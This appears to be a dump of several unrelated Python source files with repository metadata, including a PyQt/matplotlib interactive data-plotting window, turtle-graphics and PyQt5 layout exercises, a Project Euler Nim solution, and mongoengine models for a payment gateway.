index = self.menu.findText(name)
if index >= 0:
menu.setCurrentIndex(index)
value, ok, warnings = self.eval_key(name)
if ok:
menu.setCurrentText(name)
return ok
def set_xname(self, xname):
logger.debug('set_xname %r', xname)
return self.set_name(self.xmenu, xname)
def set_xscale(self, xscale):
self.xscale_box.setText(text_type(xscale))
def set_yname(self, yname):
logger.debug('set_yname %r', yname)
return self.set_name(self.menu, yname)
def set_yscale(self, yscale):
self.scale_box.setText(text_type(yscale))
def process_kwargs(self):
for k, v in self.kwargs.items():
k = ALIASES.get(k, k)
if k in PROPERTIES:
for p in self.props:
p.setdefault(k, v)
else:
getattr(self, 'set_' + k, lambda _: None)(v)
for alias, prop in ALIASES.items():
for p in self.props:
if alias in p:
p[prop] = p.get(prop, p.pop(alias))
for k in 'c', 'color', 'linestyle', 'ls':
self.kwargs.pop(k, None)
for p in self.props:
if mpl.colors._is_nth_color(p.get('color', None)):
p['color'] = nth_color_value(p['color'])
def process_cdata(self):
self.cdata = self.kwargs.get('cdata', None)
if self.cdata is not None:
self.norm = self.kwargs.get('norm', None)
if not self.norm:
self.norm = np.nanmin(self.cdata), np.nanmax(self.cdata)
if not isinstance(self.norm, mpl.colors.Normalize):
self.norm = mpl.colors.Normalize(*self.norm)
try:
self.cmap = mpl.cm.get_cmap(
self.kwargs.get('cmap', mpl.rcParams['image.cmap']))
except Exception:
self.cmap = mpl.cm.jet
def process_props(self):
logger.debug('processing props: %s', self.props)
if isinstance(self.props, dict):
self.props = self.props.copy()
if self.props:
keys, values = zip(*self.props.items())
if all(isinstance(vs, collections.Sized)
for vs in values) and all(len(vs) == len(values[0])
for vs in values):
self.props = [{} for v in values[0]]
for k, vs in zip(keys, values):
for p, v in zip(self.props, vs):
p[k] = v
else:
self.props = [self.props.copy()]
else:
self.props = [self.props.copy()]
elif isinstance(self.props, text_type):
self.props = [process_props_format(self.props)]
else:
self.props = [process_props_format(p) if isinstance(p, text_type)
else p.copy() for p in self.props]
def copy(self):
kwargs = self.kwargs.copy()
kwargs['props'] = copy.deepcopy(self.props)
kwargs['xname'] = self.xmenu.lineEdit().text()
kwargs['xscale'] = self.xscale_box.text()
kwargs['yname'] = self.menu.lineEdit().text()
kwargs['yscale'] = self.scale_box.text()
kwargs.update({k: getattr(self, k, None)
for k in ('cdata', 'cmap', 'norm')})
if isinstance(getattr(self, '_cdata', None), str):
kwargs['cdata'] = self._cdata
return dataobj(self.obj, name=self.name, **kwargs)
def duplicate(self):
data = self.copy()
if self.parent.in_cycle(self):
new_props = next(self.parent.props_iter)
for p in data[-1]['props']:
p.update(new_props)
self.parent.add_data(*data)
if len(self.parent.datas) == 2:
self.parent.init_props()
data = self.parent.datas[-1]
self.parent.set_layout()
data.menu.setFocus()
data.menu.lineEdit().selectAll()
def remove(self):
self.parent.remove_data(self)
def change_label(self):
text, ok = QtWidgets.QInputDialog.getText(
self.parent, 'Rename data object', 'New label:',
QtWidgets.QLineEdit.Normal, self.name)
if ok and text_type(text):
self.name = text_type(text)
self._labels = None
self.choose_label()
if not isiterable(self.labels):
self.labels = self.name
self.parent.draw()
def edit_cdata(self):
logger.debug('edit_cdata %r', getattr(self, '_cdata', None))
text, ok = ComboBoxDialog.getComboBoxItem(
parent=self.parent,
title='Set color data',
label='Color data key:',
items=self.words,
flags=QtWidgets.QLineEdit.Normal,
text=self._cdata
if isinstance(getattr(self, '_cdata', None), str)
else '',
)
if not ok:
return
try:
self.cdata = text
self.props[0].pop('color', None)
norm = getattr(self, 'norm', (np.nanmin(self.cdata),
np.nanmax(self.cdata)))
if not isinstance(norm, mpl.colors.Normalize):
norm = mpl.colors.Normalize(*norm)
text, ok = QtWidgets.QInputDialog.getText(
self.parent, 'Set color limits', 'Color limits:',
QtWidgets.QLineEdit.Normal, str((norm.vmin, norm.vmax)))
if not ok:
return
if not text:
text = repr((None,) * 2)
try:
self.norm = mpl.colors.Normalize(*ast.literal_eval(text))
except Exception:
self.norm = norm
cmap = mpl.cm.get_cmap(
getattr(self, 'cmap', mpl.rcParams['image.cmap']))
text, ok = QtWidgets.QInputDialog.getText(
self.parent, 'Set colormap', 'Colormap:',
QtWidgets.QLineEdit.Normal, cmap.name)
if not ok:
return
try:
self.cmap = mpl.cm.get_cmap(text)
except Exception:
self.cmap = cmap
finally:
if not hasattr(self, 'norm') or not hasattr(self, 'cdata'):
self.cdata = None
self.parent.draw()
def edit_props(self):
props_editor = self.parent.props_editor
try:
props_editor.itemChanged.disconnect()
except TypeError:
pass
props_editor.dataobj = self
for i, k in enumerate(PROPERTIES):
item = QtWidgets.QTableWidgetItem(k)
item.setFlags(QtCore.Qt.ItemIsEditable)
item.setForeground(QtGui.QColor(0, 0, 0))
props_editor.setItem(i, 0, item)
props_editor.setItem(i, 1, QtWidgets.QTableWidgetItem(''))
if self.props and (all(k in p for p in self.props) and
all(p[k] == self.props[0][k]
for p in self.props[1:])):
props_editor.setItem(i, 1, QtWidgets.QTableWidgetItem(
props_repr(self.props[0][k])))
props_editor.setWindowTitle(text_type(self.label.text()))
props_editor.itemChanged.connect(self.update_props)
props_editor.show()
def update_props(self, item):
if self.parent.props_editor.dataobj is not self:
return
row = item.row()
key = text_type(self.parent.props_editor.item(row, 0).text())
value = self.parent.props_editor.item(row, 1)
if value:
try:
value = ast.literal_eval(text_type(value.text()))
except (SyntaxError, ValueError):
value = text_type(value.text())
if key == 'color' and mpl.colors._is_nth_color(value):
value = nth_color_value(value)
if all(key in p and p[key] == value for p in self.props):
return
elif value == '' and any(key in p for p in self.props):
for p in self.props:
p.pop(key, None)
elif str(value):
for p in self.props:
p[key] = value
self.parent.props_editor.setItem(
row, 1, QtWidgets.QTableWidgetItem(props_repr(value)))
self.parent.draw(keeplims=True)
def close(self):
self.parent.props_editor.close()
def toggle_twin(self):
self.twin = not self.twin
self.parent.draw()
def sync(self, axes='xy'):
for completer in (self.completer, self.xcompleter,
self.scale_compl, self.xscale_compl):
completer.close_popup()
for ax in axes:
menu, scale = (self.xmenu, self.xscale_box) if ax == 'x' else (
self.menu, self.scale_box)
for d in self.parent.datas:
if getattr(d, 'set_%sname' % ax)(
text_type(menu.lineEdit().text())):
getattr(d, 'set_%sscale' % ax)(text_type(scale.text()))
self.parent.draw()
class Interact(QtWidgets.QMainWindow):
def __init__(self, data, app, title=None, sortkey=None, axisequal=False,
parent=None, max_label_len=None, **kwargs):
self.app = app
QtWidgets.QMainWindow.__init__(self, parent)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
self.setWindowTitle(title or ', '.join(d[1] for d in data))
if sortkey is None:
self.sortkey = kwargs.get('key', str.lower)
else:
self.sortkey = sortkey
self.grid = QtWidgets.QGridLayout()
self.frame = QtWidgets.QWidget()
self.dpi = 100
self.fig = Figure(tight_layout=False)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.frame)
self.canvas.setFocusPolicy(QtCore.Qt.ClickFocus)
self.canvas.mpl_connect('key_press_event', self.canvas_key_press)
self.axes = self.fig.add_subplot(111)
self.axes2 = self.axes.twinx()
self.fig.delaxes(self.axes2)
self.xlim = None
self.ylim = None
self.xlogscale = 'linear'
self.ylogscale = 'linear'
self.axisequal = axisequal
self.max_label_len = max_label_len
self.margins = 0
self.mpl_toolbar = NavigationToolbar(self.canvas, self.frame)
self.pickers = None
self.vbox = QtWidgets.QVBoxLayout()
self.vbox.addWidget(self.mpl_toolbar)
self.props_editor = PropertyEditor(self)
self.datas = []
for d in data:
self.add_data(*d)
self.cycle = kwargs.get('prop_cycle', mpl.rcParams['axes.prop_cycle'])
self.init_props()
self.vbox.addLayout(self.grid)
self.set_layout()
def set_layout(self):
self.vbox.addWidget(self.canvas)
self.frame.setLayout(self.vbox)
self.setCentralWidget(self.frame)
for data in self.datas:
self.setTabOrder(data.menu, data.scale_box)
self.setTabOrder(data.scale_box, data.xmenu)
self.setTabOrder(data.xmenu, data.xscale_box)
if len(self.datas) >= 2:
for d1, d2 in zip(self.datas[:-1], self.datas[1:]):
self.setTabOrder(d1.menu, d2.menu)
self.draw()
def add_data(self, obj, name, kwargs=None):
kwargs = kwargs or {}
kwargs['name'] = kwargs.get('name', name) or 'data'
data = DataObj(self, obj, **kwargs)
self.datas.append(data)
self.row = self.grid.rowCount()
self.column = 0
def axisequal():
self.axisequal = not self.axisequal
self.draw()
def add_widget(w, axis=None):
self.grid.addWidget(w, self.row, self.column)
data.widgets.append(w)
if isinstance(w, KeyHandlerMixin):
w.duplicate.connect(data.duplicate)
w.remove.connect(data.remove)
w.closed.connect(data.close)
w.axisEqual.connect(axisequal)
w.relabel.connect(data.change_label)
w.editCdata.connect(data.edit_cdata)
w.editProps.connect(data.edit_props)
w.sync.connect(data.sync)
w.twin.connect(data.toggle_twin)
w.xlim.connect(self.set_xlim)
w.ylim.connect(self.set_ylim)
if axis:
w.syncAxis.connect(lambda axes=[axis]: data.sync(axes))
self.column += 1
add_widget(data.label)
add_widget(data.menu, 'y')
add_widget(data.scale_label)
add_widget(data.scale_box, 'y')
add_widget(data.xlabel)
add_widget(data.xmenu, 'x')
add_widget(data.xscale_label)
add_widget(data.xscale_box, 'x')
def init_props(self):
self.props_iter = cycle(self.cycle)
if len(self.datas) > 1:
for data, props in zip(self.datas, self.props_iter):
if data.cdata is not None and 'color' in props:
continue
for k, v in props.items():
for p in data.props:
p.setdefault(k, v)
def warn(self, message):
self.warnings = {message}
self.draw_warnings()
self.canvas.draw()
def remove_data(self, data):
if len(self.datas) < 2:
return self.warn("Can't delete last row")
# Check if props can be reused
if self.in_cycle(data):
self.props_iter = chain([{p: data.props[0][p]
for p in self.cycle.keys}],
self.props_iter)
index = self.datas.index(data)
self.datas.pop(index)
for widget in data.widgets:
self.grid.removeWidget(widget)
widget.deleteLater()
if self.props_editor.dataobj is data:
self.props_editor.close()
self.set_layout()
self.draw()
self.datas[index - 1].menu.setFocus()
self.datas[index - 1].menu.lineEdit().selectAll()
def in_cycle(self, data):
if not data.props:
return False
d0 = {k: v for k, v in data.props[0].items() if k in self.cycle.keys}
if d0 not in self.cycle:
return False
for props in data.props[1:]:
if any(props.get(k, None) != v for k, v in d0.items()):
return False
return True
def get_scale(self, textbox, completer):
completer.close_popup()
text = text_type(textbox.text())
try:
return eval(text, CONSTANTS.copy())
except Exception as e:
self.warnings.add('Error setting scale: ' + text_type(e))
return 1.0
def get_key(self, data, menu):
text = menu.currentText()
value, ok, warnings = data.eval_key(text)
if ok:
return text
model = menu.completer.completionModel()
for row in range(model.rowCount()):
key = model.data(model.index(row, 0))
if data.eval_key(key).ok:
logger.debug('replacing %r with %r', text, key)
menu.focusNextChild()
menu.lineEdit().setText(key)
menu.setFocus()
return key
else:
self.warnings.update(warnings)
return text
@staticmethod
def cla(axes):
tight, xmargin, ymargin = axes._tight, axes._xmargin, axes._ymargin
axes.clear()
axes._tight, axes._xmargin, axes._ymargin = tight, xmargin, ymargin
def clear_pickers(self):
if self.pickers:
[p.disable() for p in self.pickers]
self.pickers = None
def plot(self, axes, data):
xscale = self.get_scale(data.xscale_box, data.xscale_compl)
yscale = self.get_scale(data.scale_box, data.scale_compl)
xname = self.get_key(data, data.xmenu)
yname = self.get_key(data, data.menu)
y, ok, warnings = data.eval_key(yname)
self.warnings.update(warnings)
logger.debug('eval_key y %r ok = %s', yname, ok)
if ok:
y = np.asanyarray(y) * yscale
x, xok, warnings = data.eval_key(xname)
self.warnings.update(warnings)
ok = ok and xok
logger.debug('eval_key x %r ok = %s', xname, ok)
if ok:
x = np.asanyarray(x) * xscale
elif xname == '_':
x = mpl.cbook.index_of(y)
if ok and x is not None and x.shape[0] in y.shape:
xaxis = y.shape.index(x.shape[0])
lines = self.lines(axes, data, x, np.rollaxis(y, xaxis))
else:
if ok and x is not None:
self.warnings.add(
'{} {} and {} {} have incompatible dimensions'.format(
xname, x.shape, yname, y.shape))
lines = self.lines(axes, data, None, y)
auto = False
if not isiterable(data.labels):
if len(lines) > 1:
auto = data.labels
data.labels = ['%s %d' % (auto, i) for i in range(len(lines))]
else:
data.labels = [data.labels]
while len(data.props) < len(lines):
data.props.append(data.props[-1])
keys = set()
for i, (line, label, props) in enumerate(
zip(lines, data.labels, data.props)):
line.set_label(label)
for key, value in props.items():
getattr(line, 'set_' + key, lambda _: None)(value)
props = copy.copy(props)
props.update([('color', line.get_color()),
('linestyle', line.get_linestyle()),
('linewidth', line.get_linewidth())])
# Don't add multi-colored lines to legend
if isinstance(line, mpl.collections.LineCollection):
continue
key = tuple(sorted(zip(*(map(str, x) for x in props.items()))))
keys.add(key)
self.label_lists.setdefault(key, []).append(label)
self.handles.setdefault(key, line)
if auto and len(keys) == 1:
for line in lines:
line.set_label(auto)
self.label_lists[key] = [auto]
return lines
def lines(self, axes, data, x, y):
colors = [p.get('color', None) for p in data.props]
if data.cdata is not None and not any(colors):
cdata = data.cdata
if x is not None and cdata.shape == y.shape:
x, y = np.ma.filled(x, np.nan), np.ma.filled(y, np.nan)
x, y, cdata = map(np.atleast_2d,
map(np.transpose, (x, y, cdata)))
def pairs(v):
mid = (v[1:] + v[:-1]) / 2.0
vnew = np.empty((2 * (v.size - 1), 2))
vnew[::2, 0], vnew[::2, 1] = v[:-1], mid
vnew[1::2, 0], vnew[1::2, 1] = mid, v[1:]
return vnew
segments = np.concatenate([np.stack((pairs(x), pairs(y)), -1)
for x, y in zip(x, y)])
colors = np.concatenate([np.repeat(c, 2)[1:-1] for c in cdata])
lines = mpl.collections.LineCollection(
segments, norm=data.norm, cmap=data.cmap)
lines.set_array(colors)
axes.add_collection(lines)
axes.autoscale_view()
return lines,
else:
lines = axes.plot(y) if x is None else axes.plot(x, y)
for line, c in zip(lines, cdata):
line.set_color(data.cmap(data.norm(c)))
return lines
else:
return axes.plot(y) if x is None else axes.plot(x, y)
def draw(self, *, keeplims=False):
logger.debug('Interact.draw keeplims=%r', keeplims)
self.mpl_toolbar.home = self.draw
if keeplims:
limits = self.axes.axis(), self.axes2.axis()
twin = any(d.twin for d in self.datas)
self.clear_pickers()
self.fig.clear()
self.axes = self.fig.add_subplot(111)
data = next((d for d in self.datas if d.cdata is not None), None)
if data and not twin:
self.mappable = mpl.cm.ScalarMappable(norm=data.norm,
cmap=data.cmap)
self.mappable.set_array(data.cdata)
self.colorbar = self.fig.colorbar(
self.mappable, ax=self.axes, fraction=0.1, pad=0.02)
self.colorbar.set_label(data._cdata if isinstance(data._cdata, str)
else data.name)
elif twin:
self.axes2 = self.axes.twinx()
for ax in self.axes, self.axes2:
if len(self.datas) > 1 and any(k in data.props
for k in self.cycle.keys
for data in self.datas):
ax.set_prop_cycle(cycler(color=['C0']))
ax._tight = bool(self.margins)
if self.margins:
ax.margins(self.margins)
lines = []
xlabel = []
ylabel = []
xlabel2 = []
ylabel2 = []
self.warnings = set()
self.label_lists, self.handles = OrderedDict(), OrderedDict()
for i, d in enumerate(self.datas, 1):
logger.debug('plotting data %s of %s', i, len(self.datas))
if d.twin:
axes, x, y = self.axes2, xlabel2, ylabel2
else:
axes, x, y = self.axes, xlabel, ylabel
lines.extend(self.plot(axes, d))
text = self.get_key(d, d.menu)
xtext = self.get_key(d, d.xmenu)
if xtext:
x.append(xtext + ' (' + d.name + ')')
y.append(text + ' (' + d.name + ')')
self.axes.set_xlabel('\n'.join(xlabel))
self.axes.set_ylabel('\n'.join(ylabel))
self.draw_warnings()
self.axes2.set_xlabel('\n'.join(xlabel2))
self.axes2.set_ylabel('\n'.join(ylabel2))
if self.xlim:
self.axes.set_xlim(self.xlim)
ylim = self.find_ylim(lines)
if ylim and not self.ylim:
self.axes.set_ylim(ylim)
if self.ylim:
self.axes.set_ylim(self.ylim)
self.axes.set_xscale(self.xlogscale)
self.axes.set_yscale(self.ylogscale)
for ax in self.axes, self.axes2:
ax.set_aspect('equal' if self.axisequal else 'auto', 'datalim')
labels = [', '.join(unique(x)) for x in self.label_lists.values()]
for i, label in enumerate(labels):
if self.max_label_len and len(label) > self.max_label_len:
labels[i] = label[:self.max_label_len] + '…'
self.pickers = [picker(ax) for ax in [self.axes, self.axes2]]
if keeplims:
self.axes.axis(limits[0])
self.axes2.axis(limits[1])
# Ignore the legend in in tight_layout
self.fig.tight_layout()
self.axes.legend(self.handles.values(), labels,
ncol=1 + len(labels) // 10,
handlelength=1.5).draggable(True)
self.canvas.draw()
def find_ylim(self, lines):
lower, upper = self.axes.get_xlim()
ymin, ymax = np.inf, -np.inf
ylim = None
_lines = []
for line in lines:
if isinstance(line, mpl.collections.LineCollection):
_lines.extend(seg.T for seg in line.get_segments() if seg.size)
else:
_lines.append(line.get_data())
for x, y in _lines:
p0, p1 = tee(zip(x, y))
try:
next(p1)
except StopIteration:
continue
for (x0, y0), (x1, y1) in zip(p0, p1):
if x0 > x1:
(x0, y0), (x1, y1) = (x1, y1), (x0, y0)
if not (lower <= x0 <= upper or lower <= x1 <= upper):
continue
X = np.array(sorted({lower, x0, x1, upper}))
if not X.size:
continue
X = X[(X >= lower) & (X <= upper)]
Y = np.interp(X, (x0, x1), (y0, y1))
if np.isfinite(Y).any():
ylim = ymin, ymax = (min(ymin, np.nanmin(Y)),
max(ymax, np.nanmax(Y)))
return ylim
def draw_warnings(self):
logger.debug('drawing warnings = %s', self.warnings)
self.axes.text(0.05, 0.05, '\n'.join(self.warnings),
transform=self.axes.transAxes, color='red')
def canvas_key_press(self, event):
key_press_handler(event, self.canvas, self.mpl_toolbar)
if event.key == 'ctrl+q':
self._close()
elif event.key in mpl.rcParams['keymap.home']:
self.xlim = self.ylim = None
self.draw()
elif event.key == 'ctrl+x':
self.set_xlim()
elif event.key == 'ctrl+y':
self.set_ylim()
elif event.key == 'ctrl+l':
self.draw(keeplims=True)
self.xlogscale = self.axes.get_xscale()
self.ylogscale = self.axes.get_yscale()
def edit_parameters(self):
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
self.mpl_toolbar.edit_parameters()
if xlim != self.axes.get_xlim():
self.xlim = self.axes.get_xlim()
if ylim != self.axes.get_ylim():
self.ylim = self.axes.get_ylim()
self.xlogscale = self.axes.get_xscale()
self.ylogscale = self.axes.get_yscale()
def _margins(self):
self.margins = 0 if self.margins else 0.05
self.draw()
def closeEvent(self, event):
self._close()
def _close(self):
self.app.references.discard(self)
self.window().close()
def _input_lim(self, axis, default):
default = text_type(default)
if re.match(r'^\(.*\)$', default) or re.match(r'^\[.*\]$', default):
default = default[1:-1]
text, ok = QtWidgets.QInputDialog.getText(
self, 'Set axis limits', '{} limits:'.format(axis),
QtWidgets.QLineEdit.Normal, default)
if ok:
try:
return eval(text_type(text), CONSTANTS.copy())
except Exception:
return None
else:
return None
def set_xlim(self, draw=True):
self.xlim = self._input_lim(
'x', self.xlim or self.axes.get_xlim())
if draw:
self.draw()
def set_ylim(self, draw=True):
self.ylim = self._input_lim(
'y', self.ylim or self.axes.get_ylim())
if draw:
self.draw()
@staticmethod
def data_dict(d):
kwargs = OrderedDict((
('name', d.name),
('xname', text_type(d.xmenu.lineEdit().text())),
('xscale', text_type(d.xscale_box.text())),
('yname', text_type(d.menu.lineEdit().text())),
('yscale', text_type(d.scale_box.text())),
('props', d.props),
('labels', d.labels),
))
for key in 'xscale', 'yscale':
try:
kwargs[key] = ast.literal_eval(kwargs[key])
except ValueError:
pass
else:
if float(kwargs[key]) == 1.0:
del kwargs[key]
if not kwargs['props']:
del kwargs['props']
return kwargs
def data_dicts(self):
return "\n".join(text_type(dict_repr(self.data_dict(d)))
for d in self.datas)
def event(self, event):
control_actions = {
QtCore.Qt.Key_M: self._margins,
QtCore.Qt.Key_O: self.edit_parameters,
QtCore.Qt.Key_Q: self._close,
}
if (event.type() == QtCore.QEvent.KeyPress and
event.modifiers() == CONTROL_MODIFIER and
event.key() in control_actions):
control_actions[event.key()]()
return True
# Create duplicate of entire GUI with Ctrl+Shift+N
elif (event.type() == QtCore.QEvent.KeyPress and
event.modifiers() ==
CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
event.key() == QtCore.Qt.Key_N):
create(*[d.copy() for d in self.datas])
return True
# Print dictionaries of keys and scales for all data with Ctrl+Shift+P
elif (event.type() == QtCore.QEvent.KeyPress and
event.modifiers() ==
CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
event.key() == QtCore.Qt.Key_P):
print(self.data_dicts())
sys.stdout.flush()
return True
return super(Interact, self).event(event)
def merge_dicts(*dicts):
"""Pad and concatenate arrays present in all input dictionaries."""
sets = [set(d) for d in dicts]
keys = sets[0].intersection(*sets)
def validate(array):
return (hasattr(array, 'dtype') and
(np.issubdtype(array.dtype, np.number) or
np.issubdtype(array.dtype, np.bool_)) and
np.squeeze(array).ndim == 1)
def pad(array):
return np.pad(np.squeeze(array), (0, length - array.size),
mode='constant', constant_values=(float('nan'),))
# Preserve non-dict types
merged = copy.copy(dicts[0])
try:
merged.clear()
except Exception:
merged = {}
for key in keys:
if all(validate(d[key]) for d in dicts):
length = max(len(d[key]) for d in dicts)
merged[key] = np.array([pad(d[key]) for d in dicts]).T
elif all(isinstance(d[key], collections.Mapping) for d in dicts):
merged[key] = merge_dicts(*[d[key] for d in dicts])
return merged
def dataobj(data, name='',
xname=None, yname=None,
xscale=None, yscale=None,
labels=None, props=None, ndim=None,
cdata=None, cmap=None, norm=None, **kwargs):
locals().update(kwargs)
return [data, name,
{k: v for k, v in locals().items()
if k not in ('data', 'name') and v is not None}]
def create(*data, **kwargs):
"""
Create an interactive plot window for the given data.
>>> create(dataobj(dict1, 'Title1', 'XaxisKey1',
... labels=['a', 'b'], xscale='1/degree'),
... dataobj(dict2, 'Title2'))
The inputs should define data dictionaries to plot as a list
containing the dictionary itself, a name for the dictionary to use
in titles and labels, and optionally a dictionary of extra settings
described below. The only optional keyword argument is `title`
which sets the window title.
Dictionary options allowed per data definition:
'labels': a list of labels for 2+ dimensional data
'xname': a dictionary key (string) to plot on the x-axis
'yname': a dictionary key (string) to plot on the y-axis
'xscale': a string or number defining scale factor for x-axis
'yscale': a string or number defining scale factor for y-axis
"""
app_created = False
app = QtCore.QCoreApplication.instance()
if app is None:
app = QtWidgets.QApplication(sys.argv)
app_created = True
app.references = getattr(app, 'references', set())
# Backwards compatibility
data = list(data)
for i, d in enumerate(data):
if isinstance(d, dict):
data[i] = [d, '']
elif hasattr(d, 'dtype') and isiterable(d.dtype.names):
data[i] = [{n: d[n] for n in d.dtype.names}, '']
elif isiterable(d[-1]) and len(d) == 4:
d[-2] = {'xname': d[-2], 'labels': list(d[-1])}
d.pop()
elif isinstance(d[2], string_types) and len(d) >= 3:
if len(d) == 3:
d[-1] = {'xname': d[-1]}
else:
d[-1]['xname'] = d[-1].get('xname', d[2])
d.pop(2)
interactive = mpl.is_interactive()
try:
mpl.interactive(False)
i = Interact(data, app, **kwargs)
finally:
mpl.interactive(interactive)
app.references.add(i)
i.show()
i.raise_()
if app_created:
app.exec_()
return i
def main():
n = 10
time = np.tile(np.linspace(0, 10), (n, 1)).T
cdata = np.linspace(0, 1, n)
d = {'time': time, 'x': np.sin(time + cdata)}
props = {'linewidth': [1, 4]}
obj = dataobj(d, name='data', xname='time', yname='x', yscale=3.0,
props=props, cdata=cdata)
create(obj)
d, name, data = copy.deepcopy(obj)
d['x'] = d['x'] * 1.3 + 0.2
del data['props']
create(obj, [d, 'other', data])
if __name__ == '__main__':
main()
| [
"jacob.niehus@gmail.com"
] | jacob.niehus@gmail.com |
2c2029eeb6e43b5d5a66ba54fa090d6a4da2db9d | 3f5e494339f09de4483237bd94932a1743970efc | /DocumentEbook/Python-Doc/PaythonProgramPractic/26ForLoopTurtle.py | 041e43ec49bd96a3e321f913d72513a450d735c1 | [] | no_license | saddamEDocument123/AllDocumentEbook | 4e63c3f689670c577d773caba621135b64e19d43 | 67dad3e0f21443013dd032c0d0d4aa331524cba1 | refs/heads/master | 2020-03-10T11:43:36.275201 | 2018-06-21T12:55:16 | 2018-06-21T12:55:16 | 129,362,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 567 | py | #using turtle and for loop we can make anything
import turtle
t = turtle.Pen()
for i in range(0,8):
t.forward(50)
t.left(45)
t.reset() #reste the t
for i in range(1,38):
t.forward(100)
t.left(175)
t.reset()
for i in range(1,25):
t.forward(100)
t.left(95)
t.right(90)
t.forward(100)
for i in range(1,20):
t.forward(100)
t.left(95)
t.reset()
t.left(180)
t.forward(100)
t.right(180)
for i in range(1,20):
t.forward(100)
t.left(95)
t.up()
t.forward(100)
t.forward(40)
for i in range(1,20):
t.forward(100)
t.left(95) | [
"sksddmhosan@gmail.com"
] | sksddmhosan@gmail.com |
e1164b25df69866a6cb1d50cfb9672d8d6217e7a | a9e81c87022fdde86d47a4ec1e74791da8aa0e30 | /python-learning/libraries/pyqt5/base/layouts/complex-layout.py | b774d4700b1104671fb8542f99d2d70b4238e84f | [
"Apache-2.0"
] | permissive | ymli1997/deeplearning-notes | c5c6926431b7efc1c6823d85e3eb470f3c986494 | f2317d80cd998305814f988e5000241797205b63 | refs/heads/master | 2020-07-29T11:15:43.689307 | 2018-05-05T10:58:18 | 2018-05-05T10:58:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,356 | py | # -*- coding: utf-8 -*-
'''
复杂布局
'''
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import sys
class Form(QMainWindow):
def __init__(self,parent=None):
super().__init__(parent)
centerWidget = QWidget()
defalutLayout = QVBoxLayout()
vboxlayout = QVBoxLayout()
hboxlayout = QHBoxLayout()
gridlayout = QGridLayout()
# 添加控件代码
buttons = []
for i in range(5):
buttons.append(QPushButton("Grid Button %d" %(i)))
vboxlayout.addWidget(QPushButton("VBox Button %d" %(i)))
hboxlayout.addWidget(QPushButton("HBox Button %d" %(i)))
gridlayout.addWidget(buttons[0],0,0)
gridlayout.addWidget(buttons[1],0,1)
gridlayout.addWidget(buttons[2],1,0,1,2) #跨1行2列
gridlayout.addWidget(buttons[3],2,0)
gridlayout.addWidget(buttons[4],2,1)
defalutLayout.addLayout(vboxlayout)
defalutLayout.addLayout(gridlayout)
defalutLayout.addLayout(hboxlayout)
centerWidget.setLayout(defalutLayout)
self.setCentralWidget(centerWidget)
self.resize(640,480)
self.setWindowTitle("PyQt5-")
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Form()
ex.show()
sys.exit(app.exec_()) | [
"kkoolerter@gmail.com"
] | kkoolerter@gmail.com |
1b9da0c86e0e095737f906fdf95ded574b5a0f3c | 7ba5ec9aa9ddca3f9b3384fc4457b0a865c2a0a1 | /src/301.py | 55d8e16e1a35748acecac34a5c82e9d8d714e5c4 | [] | no_license | ecurtin2/Project-Euler | 71f79ee90a9abd0943421677d78a6c087419e500 | 79479da7a45b3ae67c0c7ea24da5f7d43c6f25d3 | refs/heads/master | 2021-03-19T14:52:57.045443 | 2018-04-12T22:05:37 | 2018-04-12T22:05:37 | 100,059,180 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | """
Nim is a game played with heaps of stones, where two players take it in turn to remove any number of stones from any heap until no stones remain.
We'll consider the three-heap normal-play version of Nim, which works as follows:
- At the start of the game there are three heaps of stones.
- On his turn the player removes any positive number of stones from any single heap.
- The first player unable to move (because no stones remain) loses.
If (n1,n2,n3) indicates a Nim position consisting of heaps of size n1, n2 and n3 then there is a simple function X(n1,n2,n3) — that you may look up or attempt to deduce for yourself — that returns:
zero if, with perfect strategy, the player about to move will eventually lose; or
non-zero if, with perfect strategy, the player about to move will eventually win.For example X(1,2,3) = 0 because, no matter what the current player does, his opponent can respond with a move that leaves two heaps of equal size, at which point every move by the current player can be mirrored by his opponent until no stones remain; so the current player loses. To illustrate:
- current player moves to (1,2,1)
- opponent moves to (1,0,1)
- current player moves to (0,0,1)
- opponent moves to (0,0,0), and so wins.
For how many positive integers n ≤ 230 does X(n,2n,3n) = 0 ?
"""
import numpy as np
import time
def X(n):
n = int(n)
return bool(n ^ (2 * n) ^ (3 * n))
N = 2**28
t = time.time()
n = np.arange(1, N)
x = np.bitwise_xor(n, np.bitwise_xor(2*n, 3*n)).astype(bool)
total = np.sum(x)
print("Numpy done in {:10.8f} seconds.".format(time.time() - t))
print(total)
#t = time.time()
#total = sum(X(i) for i in range(1, N))
#print("Python done in {:10.8f} seconds.".format(time.time() - t))
#print(total) | [
"ecurtin2@illinois.edu"
] | ecurtin2@illinois.edu |
482552e3943e7fa329ff070ecce56cb7ea092896 | eae0bc786163a7746147240f8e1dec2f84f1713e | /zibal/gateway/mongoModel.py | 5b10387459ec22fce133faf582d44b0e20f49a5d | [] | no_license | Fahmadi/zibal | 06da4f28495532ff44ca3a9a8d44d31c6984afca | 3d482e122750f01f77f201273fcc7cc3f8558a4d | refs/heads/master | 2020-03-26T05:45:03.929188 | 2018-10-06T13:55:31 | 2018-10-06T13:55:31 | 144,572,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | from django.db.models import UUIDField
from mongoengine import StringField, Document, ReferenceField, IntField, BooleanField
class GatewayMerchant(Document):
title = StringField(max_length=120, required=True)
website = StringField(max_length=50)
merchant_key = StringField(max_length=50)
user_id = IntField(max_length=50)
user_activate = BooleanField(default=True)
meta = {'allow_inheritance': True}
class Transaction(Document):
amount = IntField(max_length=50)
callback_url=StringField(max_length=70)
gateway_id = ReferenceField(GatewayMerchant)
merchant_key = StringField(max_length=70)
payir_transaction_id = StringField(max_length=50)
status = BooleanField(default=False)
card_number = IntField(max_length=16, null=True)
transId = IntField(max_length=16 , null=True)
zibalId = IntField(max_length=12)
mobile = IntField(max_length= 12) | [
"f.ahmadi.012@gmail.com"
] | f.ahmadi.012@gmail.com |
